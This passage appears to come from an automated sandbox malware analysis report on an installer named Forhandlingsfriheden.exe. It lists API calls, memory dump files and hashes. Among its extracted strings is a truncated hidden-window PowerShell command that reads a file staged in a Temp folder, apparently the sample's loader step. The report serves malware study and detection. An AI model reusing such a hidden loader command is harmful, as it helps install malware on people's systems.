                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                            • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                                                            • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                            • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                            • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                            • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                            • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                            • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                                            • Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
                                                                            • Opcode Fuzzy Hash: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                                            • Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                            • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                                                            • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                            • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                            • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                            • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                            • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                            • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                            • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                            • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                            APIs
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                              • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                              • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                              • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                              • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                              • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                                                              • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                                                              • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            • Opcode ID: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                                            • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                                                            • Opcode Fuzzy Hash: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                                            • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                                            • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                                              • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Forhandlingsfriheden.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                              • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\Forhandlingsfriheden.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                              • Part of subcall function 004067EF: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                            • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                                              • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                              • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                                              • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                            Strings
                                                                            • powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bi, xrefs: 004049CA
                                                                            • A, xrefs: 00404AD4
                                                                            • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 00404B01
                                                                            • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
